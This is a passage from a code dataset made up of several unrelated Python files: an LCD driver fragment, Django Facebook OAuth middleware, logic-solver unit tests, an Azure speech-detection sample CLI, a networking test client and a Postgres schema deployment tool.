self.byte(pos, LCD_CMD)\n time.sleep(T_LINE / 3)\n\t \n time.sleep(T_LINE / 2)\n self.write(message[:limit])\n time.sleep(T_LINE / 2)\n\nif __name__ == '__main__':\n display = I2CDisplay()\n\n try:\n while True:\n # Send some test\n display.string(\"RPiSpy <\", 1)\n display.string(\"I2C LCD <\", 2)\n\n time.sleep(3)\n \n # Send some more text\n display.string(\"> RPiSpy\", 1)\n display.string(\"> I2C LCD\", 2)\n \n time.sleep(3)\n\n except KeyboardInterrupt:\n pass\n\n finally:\n del display","sub_path":"include/I2CDisplay.py","file_name":"I2CDisplay.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408590233","text":"import datetime\nimport decorator\nimport logging\nimport time\nimport urllib\nimport urlparse\n\nfrom .. import Facebook, FacebookError\n\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\n\n__all__ = ['Facebook', 'FacebookMiddleware', 'require_oauth']\n\nclass Facebook(Facebook):\n def oauth2_load_session(self, data):\n if data and 'access_token' in data:\n self.oauth2_token = data['access_token']\n self.oauth2_token_expires = data['expires']\n self.session_key = data['session_key']\n if data and 'uid' in data:\n self.uid = data['uid']\n\n def oauth2_save_session(self):\n return {\n 'access_token': self.oauth2_token,\n 'expires': self.oauth2_token_expires,\n 'session_key': self.session_key,\n 'uid': self.uid,\n }\n\n def oauth2_check_session(self, request):\n \"\"\"\n Check to see if we have an access_token in our session\n \"\"\"\n valid_token = False\n\n # See if we've got this user's access_token in our session\n if self.oauth2_token:\n if self.oauth2_token_expires:\n if self.oauth2_token_expires > time.time():\n # Got a token, and it's valid\n valid_token = True\n else:\n del request.session['facebook']\n else:\n # does not expire\n valid_token = True\n\n return valid_token\n\n def oauth2_clear_state(self, request):\n if 'oauth2_extended_permissions' in request.session:\n del request.session['oauth2_extended_permissions']\n self.oauth2_token = None\n self.oauth2_token_expires = None\n self.session_key = None\n self.uid = None\n\n def require_auth(self, next=None, required_permissions=None):\n args = {}\n if next:\n args['next'] = next\n if required_permissions:\n args['required_permissions'] = required_permissions\n parts = urlparse.urlparse(settings.FACEBOOK_AUTH_URL)\n query = urllib.urlencode(args)\n url = urlparse.urlunparse((\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n query,\n parts.fragment,\n ))\n return HttpResponseRedirect(url)\n\n def get_callback_path(self, path):\n \"\"\"\n Resolve the path to use for the redirect_uri for authorization\n \"\"\"\n return '%s%s' % (settings.SITE_URL, path)\n\n def oauth2_check_permissions(self, request, required_permissions,\n additional_permissions=None,\n fql_check=True, force_check=True):\n \"\"\"\n Check for specific extended_permissions.\n \n If fql_check is True (default), oauth2_check_session() should be called\n first to ensure the access_token is in place and valid to make query.\n \n \"\"\"\n has_permissions = False\n\n req_perms = set(required_permissions.split(','))\n\n cached_perms = set()\n if 'oauth2_extended_permissions' in request.session:\n cached_perms = request.session['oauth2_extended_permissions']\n\n # so now, fb_sig_ext_perms seems to contain the right perms (!)\n\n if not force_check and cached_perms and req_perms.issubset(cached_perms):\n # Note that this has the potential to be out of date!\n has_permissions = True\n elif fql_check:\n # TODO allow option to use preload FQL for this?\n perms_query = required_permissions\n \n # Note that we can query additional permissions that we\n # don't require. This can be useful for optional\n # functionality (or simply for better caching)\n if additional_permissions:\n perms_query += ',' + additional_permissions\n\n perms_results = self.fql.query(\n 'select %s from permissions where uid=%s'\n % (perms_query, self.uid))\n\n if not perms_results:\n return False\n\n perms_results = perms_results[0]\n actual_perms = set()\n for permission, allowed in perms_results.items():\n if allowed == 1:\n actual_perms.add(permission)\n request.session['oauth2_extended_permissions'] = actual_perms\n has_permissions = req_perms.issubset(actual_perms)\n\n return has_permissions\n\n def oauth2_process_request(self, request):\n \"\"\"\n Process a request handling oauth data.\n \"\"\"\n redirect_uri = self.get_callback_path(request.path)\n logging.debug('Restoring oauth data from a saved session')\n if 'facebook' in request.session:\n self.oauth2_load_session(request.session['facebook'])\n if 'code' in request.GET:\n logging.debug('Exchanging oauth code for an access_token')\n # We've got a code from an authorisation, so convert it to a access_token\n self.oauth2_access_token(request.GET['code'], next=redirect_uri)\n return HttpResponseRedirect(redirect_uri)\n elif 'signed_request' in request.REQUEST:\n logging.debug('Loading oauth data from \"signed_request\"')\n self.oauth2_load_session(\n self.validate_oauth_signed_request(request.REQUEST['signed_request']))\n return HttpResponseRedirect(request.get_full_path())\n elif 'session' in request.REQUEST:\n logging.debug('Loading oauth data from \"session\"')\n self.oauth2_load_session(\n self.validate_oauth_session(request.REQUEST['session']))\n\n def oauth2_process_response(self, request, response):\n logging.debug('Saving oauth data to session')\n request.session['facebook'] = self.oauth2_save_session()\n\ndef require_oauth(redirect_path=None,\n required_permissions=settings.FACEBOOK_PERMS, check_permissions=None,\n force_check=True):\n \"\"\"\n Decorator for Django views that requires the user to be OAuth 2.0'd.\n The FacebookMiddleware must be installed.\n Note that OAuth 2.0 does away with the app added/logged in distinction -\n it is now the case that users have now either authorised facebook users or\n not, and if they are, they may have granted the app a number of\n extended permissions - there is no lightweight/automatic login any more.\n\n Standard usage:\n @require_oauth()\n def some_view(request):\n ...\n \"\"\"\n @decorator.decorator\n def newview(view, request, *args, **kwargs):\n try:\n fb = request.facebook\n redirect_uri = fb.get_callback_path(request.path)\n valid_token = fb.oauth2_check_session(request)\n if valid_token and required_permissions:\n has_permissions = fb.oauth2_check_permissions(\n request, required_permissions, check_permissions,\n valid_token, force_check)\n else:\n has_permissions = True\n if not valid_token or not has_permissions:\n return fb.require_auth(next=redirect_uri,\n required_permissions=required_permissions)\n return view(request, *args, **kwargs)\n except FacebookError as e:\n # Invalid token (I think this can happen if the user logs out)\n # Unfortunately we don't find this out until we use the api \n if e.code == 190:\n del request.session['facebook']\n return fb.require_auth(next=redirect_uri,\n required_permissions=required_permissions)\n raise\n return newview\n\nclass FacebookMiddleware(object):\n \"\"\"\n Middleware that attaches a Facebook object to every incoming request.\n\n callback_path can be a string or a callable. Using a callable lets us\n pass in something like lambda reverse('our_canvas_view') so we can follow\n the DRY principle.\n \"\"\"\n\n def __init__(self, app_secret=None, app_name=None,\n callback_path=None, app_id=None,\n oauth2=None):\n self.app_secret = app_secret or settings.FACEBOOK_APP_SECRET\n self.app_name = app_name or getattr(settings, 'FACEBOOK_APP_NAME', None)\n self.callback_path = callback_path or getattr(settings,\n 'FACEBOOK_CALLBACK_PATH',\n None)\n self.app_id = app_id or getattr(settings, 'FACEBOOK_APP_ID', None)\n self.proxy = None\n if getattr(settings, 'USE_HTTP_PROXY', False):\n self.proxy = settings.HTTP_PROXY\n\n def process_request(self, request):\n callback_path = self.callback_path\n if callable(callback_path):\n callback_path = callback_path()\n request.facebook = Facebook(self.app_secret, app_name=self.app_name,\n callback_path=callback_path, proxy=self.proxy,\n app_id=self.app_id)\n response = request.facebook.oauth2_process_request(request)\n if response:\n return response\n if 'fb_sig_session_key' in request.GET and ('fb_sig_user' in request.GET or 'fb_sig_canvas_user' in request.GET):\n request.facebook.session_key = request.session['facebook_session_key'] = request.GET['fb_sig_session_key']\n request.facebook.uid = request.session['facebook_user_id'] = request.GET['fb_sig_user'] or request.GET['fb_sig_canvas_user']\n elif int(request.GET.get('fb_sig_added', '1')) and request.session.get('facebook_session_key', None) and request.session.get('facebook_user_id', None):\n request.facebook.session_key = request.session['facebook_session_key']\n request.facebook.uid = request.session['facebook_user_id']\n elif request.facebook.oauth2_token and not request.facebook.uid:\n request.facebook.uid = request.facebook.graph.filter('me').get()['id']\n\n def process_response(self, request, response):\n # Don't assume that request.facebook exists\n # - it's not necessarily true that all process_requests will have been called\n try:\n fb = request.facebook\n except AttributeError:\n return response\n\n fb.oauth2_process_response(request, response)\n\n if fb.session_key and fb.uid:\n request.session['facebook_session_key'] = fb.session_key\n request.session['facebook_user_id'] = fb.uid\n\n if fb.session_key_expires:\n expiry = datetime.datetime.utcfromtimestamp(fb.session_key_expires)\n request.session.set_expiry(expiry)\n\n return response\n","sub_path":"fbkit/djangokit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"565625806","text":"import unittest\n\nfrom logics.classes.exceptions import SolverError\nfrom logics.utils.parsers import classical_parser\nfrom logics.utils.solvers import classical_natural_deduction_solver\nfrom logics.utils.formula_generators.generators_biased import random_formula_generator\nfrom logics.instances.propositional.languages import classical_infinite_language_with_sent_constants_nobiconditional \\\n as cl_language\nfrom logics.instances.propositional.many_valued_semantics import classical_mvl_semantics\nfrom logics.instances.propositional.natural_deduction import classical_natural_deduction_system as nd_system\n\n\nclass TestNaturalDeductionSolver(unittest.TestCase):\n def setUp(self):\n # Elimination rules (2nd function)\n self.conjunction_elimination = classical_parser.parse('p ∧ q / p')\n self.conditional_elimination = classical_parser.parse('p, p → q / q')\n self.modus_tollens = classical_parser.parse('~q, p → q / ~p')\n self.disjunction_elimination = classical_parser.parse('p ∨ q, p → r, q → r / r')\n self.double_negation = classical_parser.parse('~~p / p')\n self.de_morgan = classical_parser.parse('~(p ∨ q) / ~p ∧ ~q')\n self.de_morgan2 = classical_parser.parse('~(p ∧ q) / ~p ∨ ~q')\n self.conditional_negation = classical_parser.parse('~(p → q) / p')\n self.conditional_negation2 = classical_parser.parse('~(p → q) / ~q')\n self.negation_elimination = classical_parser.parse('p, ~p / ⊥')\n self.disjunctive_syllogism = classical_parser.parse('p ∨ q, ~p / q')\n self.disjunctive_syllogism2 = classical_parser.parse('p ∨ q, ~q / p')\n self.disjunctive_syllogism3 = classical_parser.parse('p ∨ ~q, q / p')\n\n self.derived_rules = [self.de_morgan2, self.de_morgan, self.conditional_negation, self.conditional_negation2,\n self.modus_tollens, self.disjunctive_syllogism, self.disjunctive_syllogism2,\n self.disjunctive_syllogism3]\n\n def test_solver_noclean(self):\n # Rules in the first function\n efsq = classical_parser.parse('⊥ / p')\n conjunction_introduction = classical_parser.parse('p1 ∧ p2, p3 ∧ p4 / p2 ∧ p3')\n conditional_introduction = classical_parser.parse('p, q / p → q')\n disjunction_introduction = classical_parser.parse('p / p ∨ q')\n reductio = classical_parser.parse('p → (q ∧ ~q) / ~p')\n repetitions1 = classical_parser.parse('p / p ∧ p')\n repetitions2 = classical_parser.parse('/ p → p')\n\n inferences = [efsq, conjunction_introduction, conditional_introduction, disjunction_introduction, reductio,\n repetitions1, repetitions2]\n inferences.extend(self.derived_rules)\n\n for inference in inferences:\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print(derivation)\n # print('\\n')\n\n conjunction_steps = classical_parser.parse('p, q, r / (q → p) ∧ (r → p)')\n derivation = classical_natural_deduction_solver._solve_derivation(conjunction_steps)\n # print(derivation)\n\n def test_delete_unused_steps(self):\n inference = classical_parser.parse('((p ∧ q) ∧ (q ∧ r)) / r')\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print(derivation)\n # print(solver._get_used_steps(derivation, inference))\n\n used_steps = classical_natural_deduction_solver._get_used_steps(derivation, inference)\n derivation = classical_natural_deduction_solver._delete_unused_steps(derivation, used_steps)\n # print(derivation)\n\n def test_replace_derived_rules(self):\n for inference in self.derived_rules:\n derivation = classical_natural_deduction_solver._solve_derivation(inference)\n # print('ORIGNAL\\n', derivation)\n\n derivation = classical_natural_deduction_solver._replace_derived_rules(derivation)\n # print('REPLACED\\n', derivation)\n # print('\\n')\n\n def test_with_generator(self):\n # Test with valid arguments and see that they are solved correctly\n unsolved = 0\n for _ in range(1000):\n inf = random_formula_generator.random_valid_inference(num_premises=2, num_conclusions=1,\n max_depth=3, atomics=['p', 'q', 'r'],\n language=cl_language,\n validity_apparatus=classical_mvl_semantics)\n could_solve = False\n try:\n derivation = classical_natural_deduction_solver.solve(inf)\n could_solve = True\n except SolverError:\n # warnings.warn(f'Could not solve the derivation of {classical_parser.unparse(inf)}', SolverWarning)\n unsolved += 1\n except Exception as e:\n print(classical_parser.unparse(inf))\n raise e\n\n if could_solve:\n try:\n self.assertTrue(nd_system.is_correct_derivation(derivation, inf))\n except Exception as e:\n print(classical_parser.unparse(inf))\n print(derivation)\n correct, error_list = nd_system.is_correct_derivation(derivation, inf, return_error_list=True)\n print(error_list)\n raise e\n\n # print(f'ND solver unsolved inferences = {unsolved}/1000')\n\n # Test with invalid arguments and see that they raise SolverError\n not_found_invalid = 0\n for _ in range(100):\n invalid = False\n for x in range(100):\n inf = random_formula_generator.random_inference(num_premises=2, num_conclusions=1, max_depth=3,\n atomics=['p', 'q', 'r'], language=cl_language)\n if not classical_mvl_semantics.is_valid(inf):\n invalid = True\n if invalid:\n break\n if x == 99:\n not_found_invalid += 1\n\n self.assertRaises(SolverError, classical_natural_deduction_solver.solve, inf)\n\n # print(f'Could not find invalid inference in {not_found_invalid} cases')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/utils/test_natural_deduction_solver.py","file_name":"test_natural_deduction_solver.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"645337179","text":"#!/usr/bin/env python3\n\n#############################################################################\n# NOTICE #\n# #\n# This software (or technical data) was produced for the U.S. Government #\n# under contract, and is subject to the Rights in Data-General Clause #\n# 52.227-14, Alt. IV (DEC 2007). #\n# #\n# Copyright 2020 The MITRE Corporation. All Rights Reserved. #\n#############################################################################\n\n#############################################################################\n# Copyright 2020 The MITRE Corporation #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n#############################################################################\n\nimport sys\nimport json\nimport argparse\nimport mimetypes\nfrom datetime import timedelta\n\nimport mpf_component_api as mpf\n\nfrom acs_speech_component import AcsSpeechComponent\n\ndef guess_type(filename):\n if filename.endswith('.mkv'):\n return ('video/x-matroska', None)\n return mimetypes.guess_type(filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=(\n 'Sample Azure Speech component on audio or video files.'\n )\n )\n parser.add_argument('--start-time-millis', type=int)\n parser.add_argument('--stop-time-millis', type=int)\n parser.add_argument('--start-frame', type=int)\n parser.add_argument('--stop-frame', type=int)\n parser.add_argument('--frame-count', type=int)\n parser.add_argument('--fps', type=float)\n parser.add_argument('--duration', type=float)\n\n parser.add_argument('--acs-url', type=str)\n parser.add_argument('--acs-subscription-key', type=str)\n parser.add_argument('--acs-blob-container-url', type=str)\n parser.add_argument('--acs-blob-service-key', type=str)\n parser.add_argument('--language', type=str, default=\"en-US\")\n parser.add_argument('--no-cleanup', action='store_true')\n parser.add_argument('--blob-access-time', type=int, default=120)\n parser.add_argument('--json-file', type=str, default=None)\n parser.add_argument(\n 'files',\n nargs='+',\n help='locations of the audio or video files'\n )\n args = parser.parse_args()\n\n properties = dict(\n LANGUAGE=str(args.language),\n CLEANUP=str(not args.no_cleanup),\n BLOB_ACCESS_TIME=str(args.blob_access_time)\n )\n\n if args.acs_url is not None:\n properties['ACS_URL'] = str(args.acs_url)\n if args.acs_subscription_key is not None:\n properties['ACS_SUBSCRIPTION_KEY'] = str(args.acs_subscription_key)\n if args.acs_blob_container_url is not None:\n properties['ACS_BLOB_CONTAINER_URL'] = str(args.acs_blob_container_url)\n if args.acs_blob_service_key is not None:\n properties['ACS_BLOB_SERVICE_KEY'] = str(args.acs_blob_service_key)\n\n media_properties = dict()\n if args.duration is not None:\n media_properties['DURATION'] = str(args.duration)\n if args.fps is not None:\n media_properties['FPS'] = str(args.fps)\n if args.frame_count is not None:\n media_properties['FRAME_COUNT'] = str(args.frame_count)\n\n if not len(args.files):\n parser.error(\"Must provide at least one audio or video file\")\n\n filetype = guess_type(args.files[0])[0].split('/')[0]\n for uri in args.files:\n t = guess_type(uri)[0].split('/')[0]\n if t != filetype:\n parser.error((\n \"When processing multiple files, must either be all video or\"\n \" all audio ({:s} is a {:s} file, while {:s} is a {:s} file).\"\n ).format(args.files[0], filetype, uri, t))\n\n if filetype == 'audio':\n if args.fps is not None:\n parser.error(\n \"FPS not used when processing audio files.\"\n )\n if args.start_frame is not None or args.stop_frame is not None:\n parser.error(\n \"START_FRAME and STOP_FRAME not used when processing audio\"\n \" files. Use START_TIME_MILLIS and STOP_TIME_MILLIS.\"\n )\n elif filetype == 'video':\n if args.fps is None:\n parser.error(\n \"FPS must be provided when passing video files.\"\n )\n if args.start_time_millis is not None or args.stop_time_millis is not None:\n parser.error(\n \"START_TIME_MILLIS and STOP_TIME_MILLIS not used when\"\n \" processing video files. Use START_FRAME and STOP_FRAME.\"\n )\n else:\n parser.error(\n \"Provided file must be an audio or video file\"\n )\n\n comp = AcsSpeechComponent()\n for uri in args.files:\n print(\"Processing %s file: %s\"%(filetype,uri))\n if filetype == 'audio':\n start = args.start_time_millis\n stop = args.stop_time_millis\n if start is None:\n start = 0\n if stop is None:\n stop = -1\n dets = comp.get_detections_from_audio(mpf.AudioJob(\n job_name=\"acs_speech_sample:%s\"%uri,\n data_uri=uri,\n start_time=start,\n stop_time=stop,\n job_properties=properties,\n media_properties=media_properties,\n feed_forward_track=None\n ))\n\n elif filetype == 'video':\n start = args.start_frame\n stop = args.stop_frame\n if start is None:\n start = 0\n if stop is None:\n stop = -1\n dets = comp.get_detections_from_video(mpf.VideoJob(\n job_name=\"acs_speech_sample:%s\"%uri,\n data_uri=uri,\n start_frame=start,\n stop_frame=stop,\n job_properties=properties,\n media_properties=media_properties,\n feed_forward_track=None\n ))\n\n if args.json_file is not None:\n obj = []\n for det in dets:\n d = dict(det.detection_properties)\n d['CONFIDENCE'] = det.confidence\n if filetype == 'audio':\n d['START_TIME'] = det.start_time\n d['STOP_TIME'] = det.stop_time\n elif filetype == 'video':\n d['START_FRAME'] = det.start_frame\n d['STOP_FRAME'] = det.stop_frame\n obj.append(d)\n with open(args.json_file, 'w') as fout:\n json.dump(obj, fout)\n\n for det in dets:\n props = det.detection_properties\n speaker_id = props['SPEAKER_ID']\n transcript = props['TRANSCRIPT']\n\n print('SPEAKER ID: %s' % speaker_id)\n print(' CONFIDENCE: {:.2f}'.format(det.confidence))\n if filetype == 'audio':\n print(' SEGMENT: {} - {}'.format(\n timedelta(seconds=det.start_time // 1000),\n timedelta(seconds=det.stop_time // 1000)\n ))\n elif filetype == 'video':\n print(' FRAMES: {:d} - {:d}'.format(\n det.start_frame,\n det.stop_frame\n ))\n\n print(' TRANSCRIPT: {:s}'.format(transcript))\n","sub_path":"python/AzureSpeechDetection/sample_acs_speech_detector.py","file_name":"sample_acs_speech_detector.py","file_ext":"py","file_size_in_byte":8402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"633206208","text":"from anarchy.Client import client\nfrom anarchy.connection.tcp import TCPConnection\nfrom anarchy.cryptography.host import host\nfrom base64 import b64decode,b64encode\nfrom anarchy.coding.bencoding import Wrap\nimport time\nimport random\nfrom anarchy.connection.udp import UDPConnection\npk = host.load_pk('../../CLIEN1_PK',b'1234')\nkey = host.load_key('../../CLIEN1_KEY')\nflax = True\nwhile flax:\n # flax = False\n conn = TCPConnection()\n conn.connect(\"127.0.0.1\",1028)\n ring = random.randint(0,100000)\n params = {\n 'text' : str(random.randint(0,10000)*random.randint(0,10000)),\n # 'name' : 'roshan singh'\n }\n data_sign = str(b64encode(host.sign_str(pk, bstr=Wrap.reduceToBytes(Wrap.dictToBen(params)))), encoding='utf-8')\n data = {\n 'request' : ['post'],\n 'params' : params,\n 'data-sign' : data_sign\n # 'sign': input(),\n # 'ring': str(ring)\n }\n bstr = Wrap.reduceToBytes(Wrap.dictToBen(data))\n reqd = {\n 'request-data': {\n 'data': data,\n 'type': \"POST\",\n 'key': str(b64encode(host.gen_key_str(key)), encoding='utf-8'),\n 'sign': str(b64encode(host.sign_str(pk, bstr=bstr)), encoding='utf-8')\n },\n 'request-type': 'new'\n }\n req = client.request(reqd)\n # udp = UDPConnection()\n # udp.send(req,('127.0.0.1',1024))\n # data,addr = udp.recv()\n # print(data,addr)\n client.request_send(conn,req)\n b = client.response_recv(conn)\n d = client.response(b)\n # if reqd['request-data']['type'] == 'POST':\n # b2 = client.response_recv(conn)\n conn.close()\n # print(b)\n # print(d['response-data']['data']['db'][0][0]['post']['sign'])\n # if host.verify_str(host.load_key_str(b64decode(d['response-data']['data']['db'][0]['user']['key'])),\n # Wrap.reduceToBytes(Wrap.dictToBen(d['response-data']['data']['db'][0]['post']['signed-data'])),\n # b64decode(d['response-data']['data']['db'][0]['post']['sign'])):\n # print(\"qazwsxedc\")\n print(len(b))\n time.sleep(0.001)","sub_path":"anarchy/test/start_client.py","file_name":"start_client.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"585175512","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDeployment script that will deploy Postgres schemas to a given DB\nCopyright (c) Affinitas GmbH\n\nUsage:\n pgpm deploy [-m | --mode ]\n [-o | --owner ] [-u | --user ...]\n [-f | --file ...] [--add-config ]\n pgpm install \n pgpm uninstall \n pgpm -h | --help\n pgpm -v | --version\n\nArguments:\n Connection string to postgres database.\n Can be in any format psycopg2 would understand it\n\nOptions:\n -h --help Show this screen.\n -v --version Show version.\n -f ..., --file ...\n Use it if you want to deploy only specific files (functions, types, etc).\n In that case these files if exist will be overridden.\n Should be followed by the list of names of files to deploy.\n -o , --owner \n Role to which schema owner will be changed. User connecting to DB\n needs to be a superuser. If omitted, user running the script\n will the owner of schema\n -u ..., --user ...\n Roles to which GRANT USAGE privilege will be applied.\n If omitted, default behaviour of DB applies\n -m , --mode Deployment mode. Can be:\n * safe. Add constraints to deployment. Will not deploy schema\n if it already exists in the DB\n * moderate. If schema exists, will try to rename it by adding suffix \"_\"\n and deploy new schema with old name\n * unsafe. allows cascade deleting of schema if it exists and adding new one\n [default: safe]\n --add-config \n Provides path to additional config file. Attributes of this file overwrite config.json\n\n\"\"\"\n\nimport os\nimport psycopg2\nimport json\nimport sqlparse\nimport re\nimport sys\nimport io\nimport pkgutil\n\nfrom pgpm.utils import config\n\nfrom pgpm import _version, _variables\nfrom pgpm.utils.term_out_ui import TermStyle\nfrom docopt import docopt\n\nSET_SEARCH_PATH = \"SET search_path TO {0}, public;\"\n\n\ndef connect_db(connection_string):\n \"\"\"\n Connect to DB or exit on exception\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Connecting to databases for deployment...')\n conn = psycopg2.connect(connection_string)\n cur = conn.cursor()\n print(TermStyle.PREFIX_INFO + 'Connected to {0}'.format(connection_string))\n\n return conn, cur\n\n\ndef close_db_conn(cur, conn, conn_string):\n \"\"\"\n Close DB connection and cursor\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Closing connection to {0}...'.format(conn_string))\n cur.close()\n conn.close()\n print(TermStyle.PREFIX_INFO + 'Connection to {0} closed.'.format(conn_string))\n\n\ndef schema_exists(cur, schema_name):\n \"\"\"\n Check if schema exists\n \"\"\"\n cur.execute(\"SELECT EXISTS (SELECT schema_name FROM information_schema.schemata WHERE schema_name = '{0}');\"\n .format(schema_name))\n return cur.fetchone()[0]\n\n\ndef create_db_schema(cur, schema_name, users, owner):\n \"\"\"\n Create Postgres schema script and execute it on cursor\n \"\"\"\n _create_schema_script = \"CREATE SCHEMA {0} ;\\n\".format(schema_name)\n if users:\n _create_schema_script += \"GRANT USAGE ON SCHEMA {0} TO {1};\\n\".format(schema_name, \", \".join(users))\n if owner:\n _create_schema_script += \"ALTER SCHEMA {0} OWNER TO {1};\\n\".format(schema_name, owner)\n _create_schema_script += SET_SEARCH_PATH.format(schema_name)\n cur.execute(_create_schema_script)\n print(TermStyle.PREFIX_INFO +\n 'Schema {0} was created and search_path was changed.'\n .format(schema_name))\n\n\ndef find_whole_word(w):\n \"\"\"\n Finds whole word\n \"\"\"\n return re.compile(r'\\b({0})\\b'.format(w), flags=re.IGNORECASE).search\n\n\ndef collect_scripts_from_files(script_paths, files_deployment):\n \"\"\"\n Collects postgres scripts from source files\n \"\"\"\n script_files_count = 0\n script = ''\n if script_paths:\n if not isinstance(script_paths, list):\n script_paths = [script_paths]\n if files_deployment: # if specific script to be deployed, only find them\n for list_file_name in files_deployment:\n if os.path.isfile(list_file_name):\n for i in range(len(script_paths)):\n if script_paths[i] in list_file_name:\n script_files_count += 1\n script += io.open(list_file_name, 'r', -1, 'utf-8-sig').read()\n script += '\\n'\n print(TermStyle.PREFIX_INFO_IMPORTANT + TermStyle.BOLD_ON +\n '{0}'.format(list_file_name) + TermStyle.RESET)\n else:\n print(TermStyle.PREFIX_WARNING + 'File {0} does not exist, please specify a correct path'.format(list_file_name))\n\n else:\n for script_path in script_paths:\n for subdir, dirs, files in os.walk(script_path):\n # print(subdir, dirs) # uncomment for debugging\n for file_info in files:\n script_files_count += 1\n script += io.open(os.path.join(subdir, file_info), 'r', -1, 'utf-8-sig').read()\n script += '\\n'\n print(TermStyle.PREFIX_INFO_IMPORTANT + TermStyle.BOLD_ON +\n '{0}'.format(os.path.join(subdir, file_info)) + TermStyle.RESET)\n return script, script_files_count\n\n\ndef get_scripts(path_parameter, config_data, files_deployment, script_type):\n \"\"\"\n Gets scripts from specified folders\n \"\"\"\n\n if path_parameter in config_data:\n path_value = config_data[path_parameter]\n else:\n path_value = None\n\n print(TermStyle.PREFIX_INFO + 'Getting scripts with {0} definitions'.format(script_type))\n script, files_count = collect_scripts_from_files(path_value, files_deployment)\n if path_value:\n if files_count == 0:\n print(TermStyle.PREFIX_WARNING + 'No {0} definitions were found in {1} folder'.format(script_type, path_value))\n else:\n print(TermStyle.PREFIX_INFO + 'No {0} folder was specified'.format(script_type))\n\n return script, files_count\n\n\ndef reorder_types(types_script):\n \"\"\"\n Takes type scripts and reorders them to avoid Type doesn't exist exception\n \"\"\"\n print(TermStyle.PREFIX_INFO + 'Running types definitions scripts')\n print(TermStyle.PREFIX_INFO + 'Reordering types definitions scripts to avoid \"type does not exist\" exceptions')\n _type_statements = sqlparse.split(types_script)\n # TODO: move up to classes\n _type_statements_dict = {} # dictionary that store statements with type and order.\n type_unordered_scripts = [] # scripts to execute without order\n for _type_statement in _type_statements:\n _type_statement_parsed = sqlparse.parse(_type_statement)\n if len(_type_statement_parsed) > 0: # can be empty parsed object so need to check\n # we need only type declarations to be ordered\n if _type_statement_parsed[0].get_type() == 'CREATE':\n _type_body_r = r'\\bcreate\\s+\\btype\\s+\\b(\\w+\\.\\w+|\\w+)\\b'\n _type_name = re.compile(_type_body_r, flags=re.IGNORECASE).findall(_type_statement)[0]\n _type_statements_dict[str(_type_name)] = \\\n {'script': _type_statement, 'deps': []}\n else:\n type_unordered_scripts.append(_type_statement)\n # now let's add dependant types to dictionary with types\n _type_statements_list = [] # list of statements to be ordered\n for _type_key in _type_statements_dict.keys():\n for _type_key_sub, _type_value in _type_statements_dict.items():\n if _type_key != _type_key_sub:\n if find_whole_word(_type_key)(_type_value['script']):\n _type_value['deps'].append(_type_key)\n # now let's add order to type scripts and put them ordered to list\n _deps_unresolved = True\n _type_script_order = 0\n _type_names = []\n type_ordered_scripts = [] # ordered list with scripts to execute\n while _deps_unresolved:\n for k, v in _type_statements_dict.items():\n if not v['deps']:\n _type_names.append(k)\n v['order'] = _type_script_order\n _type_script_order += 1\n if not v['script'] in type_ordered_scripts:\n type_ordered_scripts.append(v['script'])\n else:\n _dep_exists = True\n for _dep in v['deps']:\n if _dep not in _type_names:\n _dep_exists = False\n if _dep_exists:\n _type_names.append(k)\n v['order'] = _type_script_order\n _type_script_order += 1\n if not v['script'] in type_ordered_scripts:\n type_ordered_scripts.append(v['script'])\n else:\n v['order'] = -1\n _deps_unresolved = False\n for k, v in _type_statements_dict.items():\n if v['order'] == -1:\n _deps_unresolved = True\n return type_ordered_scripts, type_unordered_scripts\n\n\ndef install_manager(connection_string):\n \"\"\"\n Installs package manager\n \"\"\"\n conn, cur = connect_db(connection_string)\n\n # Create schema if it doesn't exist\n if schema_exists(cur,_variables.PGPM_SCHEMA_NAME):\n print(TermStyle.PREFIX_ERROR +\n 'Can\\'t install pgpm as schema {0} already exists'.format(_variables.PGPM_SCHEMA_NAME))\n close_db_conn(cur, conn, connection_string)\n sys.exit(1)\n else:\n # Prepare and execute preamble\n _deployment_script_preamble = pkgutil.get_data('pgpm', 'scripts/deploy_prepare_config.sql')\n print(TermStyle.PREFIX_INFO + 'Executing a preamble to install statement')\n cur.execute(_deployment_script_preamble)\n\n # Python 3.x doesn't have format for byte strings so we have to convert\n _install_script = pkgutil.get_data('pgpm', 'scripts/install.tmpl.sql').decode('utf-8')\n print(TermStyle.PREFIX_INFO + 'Installing package manager')\n cur.execute(_install_script.format(schema_name=_variables.PGPM_SCHEMA_NAME))\n\n _add_package_info = pkgutil.get_data('pgpm', 'scripts/functions/_add_package_info.sql')\n cur.execute(_add_package_info)\n cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n [_variables.PGPM_SCHEMA_NAME, _variables.PGPM_SCHEMA_SUBCLASS, None,\n 0, 0, 1, None, None, 'Package manager for Postgres', 'MIT'])\n\n # Commit transaction\n conn.commit()\n\n close_db_conn(cur, conn, connection_string)\n\n\ndef main():\n arguments = docopt(__doc__, version=_version.__version__)\n user_roles = arguments['--user']\n if arguments['--owner']:\n 